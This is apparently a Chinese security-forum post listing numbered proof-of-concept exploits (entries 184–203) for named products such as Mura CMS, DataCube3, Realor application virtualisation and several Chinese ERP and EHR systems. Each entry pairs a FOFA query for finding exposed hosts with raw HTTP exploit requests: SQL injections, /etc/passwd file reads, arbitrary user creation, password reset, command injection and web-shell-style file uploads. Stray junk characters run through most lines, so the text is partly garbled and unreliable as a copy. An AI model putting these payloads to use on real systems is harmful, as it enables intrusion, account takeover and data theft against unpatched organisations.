% E9 D- s/ i/ ]" C184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% ?$ r1 G+ W5 b+ _
FOFA:server="SunFull-Webs"
! o# P2 g3 a8 |  Z/ c# D5 BPOST /soap/AddUser HTTP/1.1
& M: {6 H) x# ZHost: your-ip7 ^* s( f. h  O) C0 }' H5 `
Accept-Encoding: gzip, deflate
5 P/ A$ s: B! C6 g9 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
5 G0 g; }6 Q8 J7 p1 U% U' [Accept: application/xml, text/xml, */*; q=0.016 C: H2 T* M0 k! E6 T
Content-Type: text/xml; charset=utf-86 Q* A: D  ~0 x/ X/ M9 i2 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" h" L, o6 A% T
X-Requested-With: XMLHttpRequest
. g4 W9 k+ D5 i
; E6 k4 Y3 J/ J2 R- l- m/ C, C$ \# [& c  J7 Q
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')$ d, n9 q0 J, E1 Y

1 T. U8 d1 L0 f; o1 l$ Q4 ]& e# p% J1 K( Q5 s4 M
185. 瑞友天翼应用虚拟化系统SQL注入
$ F: e. b( I! m( L/ eversion < 7.0.5.1
6 b6 R' S0 z+ W, {0 O3 cFOFA:app="REALOR-天翼应用虚拟化系统"  y. J( D; g# v  L
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1' h8 F% p4 ^3 f% E3 ]& j" y/ [
Host: host
7 p- e" O: T$ F% L0 M2 @
% ^- x4 p! S: V- |: t  p. R6 d4 z& E! Y" o5 R0 W! b
186. F-logic DataCube3 SQL注入
; F  K" s& U: a+ z" tCVE-2024-317508 Z# r8 G+ r0 x/ S
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统4 c/ f9 T$ A3 ~% a: U
FOFA:title=="DataCube3"
8 X& e+ T* H6 h# b/ |3 bPOST /admin/pr_monitor/getting_index_data.php HTTP/1.16 J' x5 e$ {0 n' B2 v4 E7 R
Host: your-ip
; _6 L" x3 f$ s" `8 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0& q$ Q- `/ p$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.89 C6 X2 z5 r, E0 r( r6 |  R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 O/ D% H* J8 Y
Accept-Encoding: gzip, deflate5 F6 G+ E- h, z( Y; i. j8 U1 g
Connection: close
# [3 J' e2 ^  N: m: i6 r& nContent-Type: application/x-www-form-urlencoded& f. R; w7 H, `& n' h5 R

# {7 `7 R( x4 J3 y* L5 q  a. \req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450* ^  N2 a& e4 g1 i: y6 X
! X8 `9 i* |2 c  @4 _7 G- I! f* E0 Y

6 h9 F1 i3 n$ U& g+ {5 {187. Mura CMS processAsyncObject SQL注入
" @# @% G. }6 e) D- D" K1 KCVE-2024-32640" T1 e# F! D* U; |5 A
FOFA:"Mura CMS"
. y. `0 s% Q( kPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1( U2 G. U2 t8 _8 I
Host: your-ip/ p& i. B* }$ t& H* n8 i# ^4 E
Content-Type: application/x-www-form-urlencoded( h/ M2 h8 O: F/ C4 y: V

* ~: D7 g' e0 \% b# R6 h0 y* o" `0 C: u1 L0 O
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 ~& ?  Y7 Z( u8 N9 @( k
+ N  B$ K% ^8 N. Y$ m

1 ]) z9 g9 \) a% ~. Q$ ]188. 叁体-佳会视频会议 attachment 任意文件读取+ @- l8 m# V$ Y/ _) |. Y- h" ^
version <= 3.9.7
' P3 f) E; Z# g. f8 e+ F8 }$ AFOFA:body="/system/get_rtc_user_defined_info?site_id"
( P- h2 i  z" OGET /attachment?file=/etc/passwd HTTP/1.1
# i8 d, N9 G- l( F- |! S0 q1 wHost: your-ip
& ~7 ?% S* G% e" UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! \% l" S* }* xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) ^, X7 _, j# A1 K0 r/ K3 ?
Accept-Encoding: gzip, deflate7 g: [% E- j/ C6 A& u( |/ ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: p3 T+ d: l! p' U8 q  i
Connection: close7 |  K9 V4 O7 B- J8 {  [
. N. o9 ^4 K; H$ m4 X

, \' r  X4 _, s' D  c6 l9 l189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 R$ s7 b. s) j$ L6 fFOFA:app="LANWON-临床浏览系统"
/ K6 F, n; M7 k$ TGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
" ]% n, o/ _( D5 B- ]/ B: PHost: your-ip
7 y/ v* y1 c: B: C5 d/ V$ ~2 FUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ t/ ?* o" s8 _0 y# x# `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 W& W$ x: L$ H3 S; l1 v( BAccept-Encoding: gzip, deflate7 Y* o  s2 K8 V7 [& f0 ^: \. e
Accept-Language: zh-CN,zh;q=0.9+ W5 F. J$ ~) g) g: e
Connection: close3 L% v  g  V2 ?0 l+ W( a) t$ p/ Q
9 _+ H$ H9 I! ]$ M; L8 ^% Z/ @5 w

% ~! v& s3 i: U' ?/ ]" S190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& b8 p1 O( }$ NFOFA:title=="短视频矩阵营销系统"
5 `8 @; U+ a: y9 FPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
4 ~2 a7 X& q4 I4 Y5 y! l6 ]Host: your-ip
4 `, _, i  X( c# NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
0 {8 w+ _! g. ?" W/ E- yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 E+ C) L% u4 V5 r3 t! [- j
Content-Type: application/x-www-form-urlencoded3 F; v9 P2 U& M- K) \: @: ~
Accept-Encoding: gzip, deflate
# ^- D) ?% f# Q6 h5 s  r9 e5 B" h+ ?Accept-Language: zh-CN,zh;q=0.9
" {6 ?7 ^) v* e$ Q! B3 b! z+ S( T2 d* h4 X! D1 U$ L/ S7 W
poi=file:///etc/passwd
5 g2 c% D0 Y1 |! b. W: g, z4 V- {# ]" f# e7 Z/ m; O

* V3 S" p& g( k3 w191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入# O# x6 R/ Z" b& K! T# S( |0 I3 g
FOFA:body="/CDGServer3/index.jsp"$ m' o+ v% f4 [+ o1 Z/ t$ i
POST /CDGServer3/js/../NavigationAjax HTTP/1.16 Q7 d. K7 M8 k9 v4 u! I1 M
Host: your-ip0 f, P" u+ A1 u% p0 e8 C" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 ~7 R1 S7 }4 Y6 x' ~. cContent-Type: application/x-www-form-urlencoded
% W/ g: t# y* B3 y
4 z) G+ P8 [% scommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=3 t9 Q* Q5 c# ]. s  t
5 }/ [7 s5 [  m6 _3 z
* N  H3 {- H, r( K2 u
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
) N$ R1 {2 L( O2 U" YFOFA:title="用户登录_富通天下外贸ERP"
$ b; y: n# L, b0 m  j8 X9 W1 EPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1- m' p4 J6 o" [9 t
Host: your-ip
5 R/ n! F# ?( w4 C2 K, @+ X+ Y- `' zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; |: D* L' ~( l/ `; v4 |  k
Content-Type: application/x-www-form-urlencoded2 Q) O3 E/ E0 G+ g% H1 H/ N" G
/ K. Z2 l/ P; l* `1 X! G! z' d% p

2 N/ }+ N1 w  |2 J* f8 l<% @ webhandler language="C#" class="AverageHandler" %>
+ U9 [3 K7 n8 ?using System;
2 @' Y7 T% ?: A/ j) q3 Iusing System.Web;
- l% T4 I. A/ J& I: Rpublic class AverageHandler : IHttpHandler& s+ U) k$ q( e$ w
{% C' t0 b7 |+ M; p) J9 X/ ~
public bool IsReusable" c# l* T" P% ]7 @5 Q& ^8 V8 o
{ get { return true; } }) c8 D# v1 x9 c5 U0 g
public void ProcessRequest(HttpContext ctx)
. D1 K6 h# L; v( Y5 R{
+ |+ N0 j$ {* q) V8 vctx.Response.Write("test");- K2 E4 W- ~( M+ [) T
}& m' u% V! ~* }) h" N
}
# W, E1 |) x9 ~0 r1 }  `# ^& b( X3 x
& t1 p6 C( M% I0 `5 |6 [9 s' w
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行3 S$ q/ I2 D+ r* J3 z3 X
FOFA:body="山石云鉴主机安全管理系统"
/ c" T7 V7 P* h9 I( T: vGET /master/ajaxActions/getTokenAction.php HTTP/1.1
/ y* i7 f! W  t* p$ A9 k4 qHost:2 o! L9 z# p  X3 S( q+ Y" p
Cookie: PHPSESSID=2333333333333;- L& q, x' ^5 g# R
Content-Type: application/x-www-form-urlencoded9 N0 Z0 T( L% E4 T( k! n2 K
User-Agent: Mozilla/5.0
4 W  l5 I7 I1 N" w3 {% y% R
; s0 l8 d- e; C' S
& A5 V3 a% n. M0 {( xPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1" a' l( I& S0 j8 z8 B
Host:
+ s) ^$ a; V) o, q3 s6 tUser-Agent: Mozilla/5.0' Z, q1 ?7 ?- @  N3 U9 |
Accept-Encoding: gzip, deflate/ R, j+ D- ]6 x9 D( A
Accept: */*
6 B# M3 V' E/ e: D4 }: y* aConnection: close9 T8 u# \3 H6 _5 ]
Cookie: PHPSESSID=2333333333333;
( S( |' R- E" [' m7 ~8 aContent-Type: application/x-www-form-urlencoded
7 ?0 Q0 o" i- y- P- _" A$ jContent-Length: 84
/ a5 {* f, \. X$ {' }8 p
5 e1 t0 E( C6 e; h6 [param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')3 m7 M$ x7 A: C# L

2 ]2 U+ {  [: u7 E5 h7 D
8 W5 |& m, l0 D: e' [GET /master/img/config HTTP/1.1$ K# c7 R4 L$ Y+ c; O
Host:
5 D. \* b/ l2 ~  a$ jUser-Agent: Mozilla/5.0
2 \$ Y( x1 a' C3 `
* I, w% z  O+ C5 Y
0 v/ A( W0 {  [3 m5 C1 X' t0 I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
+ K& D9 v) v  QFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
( K7 j0 b3 t( E( N, b8 ?+ T/ o* b
POST /servlet/uploadAttachmentServlet HTTP/1.1- @* o! m1 s& }" r8 s5 C
Host: host3 ^# k% Y% v( [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
% s& _# m/ \) ?6 V- sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ X  {  ?- v4 z7 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% A2 a" v# N- LAccept-Encoding: gzip, deflate2 E& M1 e" P; x7 {" w
Connection: close
; R: ?& h( v! @: ]& xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 |; o6 v9 M9 m; ?6 o- v- Y$ ~$ [------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" d' w% k: i5 P2 Q4 Q9 Q: O) {9 H" F7 o' f1 m; p
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
) i, [  |4 i3 Z0 ^Content-Type: text/plain
2 D, q: G4 d6 ?9 Q( L2 S* E<% out.println("hello");%>  `( `, G$ j0 y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- S# b; F; Y  pContent-Disposition: form-data; name="json"
1 w) a2 a; K: Q' s {"iq":{"query":{"UpdateType":"mail"}}}
( y  ]$ h2 f2 e------WebKitFormBoundaryKNt0t4vBe8cX9rZk--0 e+ C, Q, M$ Z

  o5 U* t  g1 |/ O9 Z/ ^! y7 `: J- l9 |6 }: l6 B3 g
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行0 {1 W7 E0 s; s) t# x
FOFA:title=="飞鱼星企业级智能上网行为管理系统
" o1 h, a5 `" H" ?POST /send_order.cgi?parameter=operation HTTP/1.1
* r- v: T9 y! \7 E0 V) \  FHost: 127.0.0.1: j: t1 p; D! |
Pragma: no-cache. e' h- q6 y& |0 J3 ], |
Cache-Control: no-cache
, r4 A- {3 ?1 [  XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.367 E5 g5 v( E7 d3 U# j
Accept: */*
2 E" X' A$ g4 u" e* HAccept-Encoding: gzip, deflate! ]% Q; q3 D2 A1 R4 ~& X$ q  @2 V
Accept-Language: zh-CN,zh;q=0.94 r/ M; P9 a. J
Connection: close2 `$ `, Q+ I: _  u4 B# O
Content-Type: application/x-www-form-urlencoded
1 m2 b" B! t6 ]- ?Content-Length: 68
- Y9 ?5 C2 E7 z: w. ~: X, p( p
0 f; v3 R3 m2 a( [- X+ v. G{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}- @* j( }9 ^' |
+ R* v6 K9 A2 j9 U; u4 N  m

* N9 |) a& J- d/ N196. 河南省风速科技统一认证平台密码重置9 f+ o- U' c# J; m
FOFA:body="/cas/themes/zbvc/js/jquery.min.js": t  W3 B& t4 |1 y* l
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1: k  F! }1 {4 x# ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: f6 ^" g4 x1 |# u1 J& gContent-Type: application/json;charset=UTF-8
# `, `1 P; U7 n3 @: J/ cX-Requested-With: XMLHttpRequest
+ V; F' R  r* b) c; GHost:
3 Q; G# V4 c+ Q: _7 XAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
' k( k! e" _( c6 E& T" xContent-Length: 45
# [! j$ w( k" ]8 q7 N' c2 E1 RConnection: close
! P5 L3 I; ], u) I% W, c% A0 q/ G. J
{"xgh":"test","newPass":"test666","email":""}
  {6 E' d6 g1 W3 ?1 }) O  h+ _
4 W  M/ i5 B% d' w" l; c0 @2 a0 ^. s4 r5 q* S! c. C- M  i' n) K$ V, W
/ r" k* }/ F, R
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入6 d9 u* `# r- s# x9 b# A2 J
FOFA:app="浙大恩特客户资源管理系统"
9 `: _' p! x8 ?% Y( t" oGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1* x! F0 I9 O. @% t/ F
Host:
3 H+ L/ I" L% i- k1 Y3 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
4 W+ p4 |0 D' R5 }Accept-Encoding: gzip, deflate
7 d) J. |; i/ K8 `Connection: close5 N3 V) h/ O+ b2 ~4 P# J" F( e
$ o4 }7 g/ m/ [: o. L

8 ]1 e7 r) x* I0 d" h- @+ Z" @. |4 V* M( D2 L2 z  Q, M
198.  阿里云盘 WebDAV 命令注入
: Y4 e1 u7 N7 D- c/ \CVE-2024-29640
0 q# J" D0 g# uGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1& z8 O2 B3 @- m
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
$ y# F! K4 f1 H, }9 sAccept: */*
% n! p( z; d' ?* HAccept-Encoding: gzip, deflate* ~( y5 q$ k3 }: n# m
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
3 h0 d7 M0 d( L( v  }7 `: R% l; Q* t/ VConnection: close
; T( ~/ J  |; t& Z' E3 T& a- w% b8 w! `8 I; g8 E

) W! B7 D% s3 x6 j199. cockpit系统assetsmanager_upload接口 文件上传
* W% F- A- O1 z0 W& p2 a2 h4 l6 E/ ?$ U/ C" g
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:! N3 s, S) q4 P# t
GET /auth/login?to=/ HTTP/1.1
, Q2 i% i: ?) u0 z& v: E+ _
  g' w% K. s% e- Q8 Y. X$ B* T响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
8 g4 U1 i8 ]% ?# g! w) A) ~& y( o' S) d/ b3 K8 u- q
2.使用刚才上一步获取到的jwt获取cookie:
5 A3 e3 p3 G; G+ C! e9 \- _
- d2 W# I! f! L# W) D$ A. H5 ?; T5 I: YPOST /auth/check HTTP/1.1
! B1 X% k: r# ^% p+ A3 OContent-Type: application/json7 d# a# Q6 j1 n% I
4 A. G. \) Q0 y, j( @; [
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}) Y4 d' ^* w! X+ _2 ?' o0 F& t, s

5 p" b0 n" f9 _# }% e响应:200,返回值:
5 O- b: D" q. F+ r/ dSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
) Q- U- A+ e) @3 J; j6 @! H5 xFofa:title="Authenticate Please!"7 Q0 _9 k+ d( Z" Y7 r0 g( I  b
POST /assetsmanager/upload HTTP/1.14 X, S2 Q+ N  J6 @; C% Q/ U
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3- p( y5 _- O1 d5 \% |  y5 K, u8 [
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
8 R1 K! A1 E5 ^' L6 U. G1 w$ `0 q3 r6 V+ V$ k: r1 K3 p9 k
-----------------------------36D28FBc36bd6feE7Fb3
2 V4 [. w, O4 k0 p" ]Content-Disposition: form-data; name="files[]"; filename="tttt.php"+ n+ ?& b9 {" \" C& m5 u
Content-Type: text/php
) Z, D. k$ p: I& P2 m) a: T5 }: _# W: e" o( A! X3 Y. C
<?php echo "tttt";unlink(__FILE__);?>
3 i& `9 y0 @; V1 g4 V# T0 P9 K/ Y' U-----------------------------36D28FBc36bd6feE7Fb3
! b6 [0 k' }- E: ^$ E0 c. l2 cContent-Disposition: form-data; name="folder"2 }6 L: [- S2 H' l0 A

* ?# y: e+ e- M, a* U  `" S-----------------------------36D28FBc36bd6feE7Fb3--  ~* Q( S- E. O- H% L0 C* e. g* A
/ O- d9 _1 ^7 I# Z

( r& G6 f" _/ L* v/storage/uploads/tttt.php
0 t; `/ [& g' N6 C3 V
. X  Y4 V9 u8 \& T: _$ ]200. SeaCMS海洋影视管理系统dmku SQL注入: B/ K' i, S6 |& o) L8 K1 k
FOFA:app="海洋CMS"
9 L1 R0 Q3 }. c( r& P) tGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.19 r  x# p9 |5 M( K9 \3 ]4 r
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
6 A$ U% O: x! K, W0 VUpgrade-Insecure-Requests: 10 K: Z- m- h6 |4 n3 W" {6 Y9 @2 A
Cache-Control: max-age=0
+ o6 I$ a$ C: S/ IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ A) _5 i# h, h# g2 b
Accept-Encoding: gzip, deflate
4 J# y# s; T; L, k6 T' c( MAccept-Language: zh-CN,zh;q=0.9
. J" ]' D  A, y! T; q+ U/ [
1 ]" k9 m7 P- U: `9 [5 S" t" P3 r9 c0 r1 m. A, g; G
201. 方正全媒体新闻采编系统 binary SQL注入
5 u. e% J) [  \! h# V5 L0 @FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
  P9 R) B4 l. b6 C1 \POST /newsedit/newsplan/task/binary.do HTTP/1.1
% M/ N- V% V- [( @Content-Type: application/x-www-form-urlencoded
3 r: K4 q! ~0 N& U. i* U5 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 q. G7 o, D+ L/ o/ g
Accept-Encoding: gzip, deflate
. P2 O  I- O' K/ a! oAccept-Language: zh-CN,zh;q=0.97 y; a! ^1 w! G6 x7 I7 s+ Y
Connection: close1 e1 ?3 B7 {) U/ c2 n/ X* G$ \

2 B% _- I# a4 h) v! |0 V) _TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1( K$ @7 b. s$ e+ ?  F7 V

" R/ w1 u: |" s
$ [6 j0 Q- l/ I9 S202. 微擎系统 AccountEdit任意文件上传; T% c; }  [. Y* t
FOFA:body="/Widgets/WidgetCollection/"
' ~2 N. V/ A) G  q* k. o获取__VIEWSTATE和__EVENTVALIDATION值1 c( S* |" U2 V% n# p7 m( `* t
GET /User/AccountEdit.aspx HTTP/1.1
5 ^3 p. k7 }' l1 zHost: 滑板人之家
1 X9 T0 A3 v5 ^5 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
/ [# W4 m3 l+ ZContent-Length: 0% j7 ^  `2 T. V0 [% k( n
6 C& n; w! k2 {/ R- L
0 u( L' V7 u3 u2 n; z: q
替换__VIEWSTATE和__EVENTVALIDATION值
; }, r6 [5 C  F9 |POST /User/AccountEdit.aspx HTTP/1.1' i; R2 d3 `4 e* Z* w
Accept-Encoding: gzip, deflate, br' [" a& E$ u/ @
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
, h8 U; r0 @% y- f8 T; e+ n. k  _& g+ [; |9 e2 J) m5 w5 R
-----------------------------786435874t38587593865736587346567358735687. s' T3 B* I; {3 |9 F! R% L
Content-Disposition: form-data; name="__VIEWSTATE"
; V8 D8 N& `4 t0 C! [" @. C$ G: l; P6 H! S2 q6 K
__VIEWSTATE2 g, V) E. E& \" k
-----------------------------786435874t385875938657365873465673587356877 E( B6 T  L8 q# X
Content-Disposition: form-data; name="__EVENTVALIDATION"& D" d/ n. ]& B% S8 b8 o
- R6 D, _( T% P! ?& l
__EVENTVALIDATION$ ?7 K/ j2 L  l* `
-----------------------------786435874t38587593865736587346567358735687
- o  D0 b# X  Z% vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"3 ]. I+ E& W6 g/ W- y% N( F
Content-Type: text/plain
0 K5 `* z; P1 s7 @% q5 v. e, S9 Q9 R; i3 j0 b7 ^2 d! a1 D% \- L0 z' i* p
Hello World!
, w9 I: |% C5 N" n6 R-----------------------------786435874t38587593865736587346567358735687
5 s/ H/ |5 Y! {. t" d" H) M7 UContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload", b1 D8 r3 X# H* F2 r

+ a, v3 f* Z" E; U3 P2 T& n上传图片
$ b9 S) ~8 E5 I' B: a2 m0 P-----------------------------786435874t38587593865736587346567358735687
' T$ B+ w0 G, c% a, EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
' Z) c- |' Q. _, T  V; q% ^6 k* T  h# b$ W8 O) J+ H# z
  A% e, l5 }7 [0 _2 Y3 ?2 o& r( L( }
-----------------------------786435874t385875938657365873465673587356870 [; B$ b5 [6 Y, X1 m" g+ o: v
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
# b. V' V6 R' e1 a9 b' m4 c# V. ^
9 X* Y' ?4 L, M; r8 d( x& q4 b+ `- X9 x4 k7 T
-----------------------------786435874t38587593865736587346567358735687--! t0 R! u/ v9 N4 R7 M
2 E2 B! U7 d: Y
# l5 X2 s: ]; Z) M+ S2 \5 {
/_data/Uploads/1123.txt* v& y6 D4 v0 {% x- ^  _8 q

: q, {* ~, b. X# p- F( w' U203. 红海云EHR PtFjk 文件上传
' a; _! z6 h% f3 g/ xFOFA:body="RedseaPlatform"" F! `: y" R! z* R$ w- t
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1+ Q& e# Q' y7 r4 O% e
Host: x.x.x.x
* I( w- G! D" K1 W5 F% ZAccept-Encoding: gzip9 g8 T' U( S( P( e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 u0 Q$ C# y2 {# C$ ?# z7 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
2 K. u$ Z, ~" V2 i, Q* zContent-Length: 210  s" H# L* x' n: e

1 a" S, h: T  R------WebKitFormBoundaryt7WbDl1tXogoZys4( E# Z$ `: V  S  q
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
4 Q6 U5 K7 U4 U6 i; b5 ZContent-Type:image/jpeg* L1 B0 a, ~) S% E" @  k: O
$ W9 v3 K" Q6 }, Z+ C; e6 L2 R
<% out.print("hello,eHR");%>$ a0 d4 ~" w" N% D& w
------WebKitFormBoundaryt7WbDl1tXogoZys4--) r1 l1 y: @& _, D; K/ P& R
9 B& I4 g  U$ h! q  e

$ H' m$ k1 A2 c# W' g4 K8 I4 F) {. l+ A) j: S& o
2 P+ C3 y7 ]0 t9 B3 v, I# O
: H# {: p. c/ a, q
0 Y0 D/ p0 I, b* Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表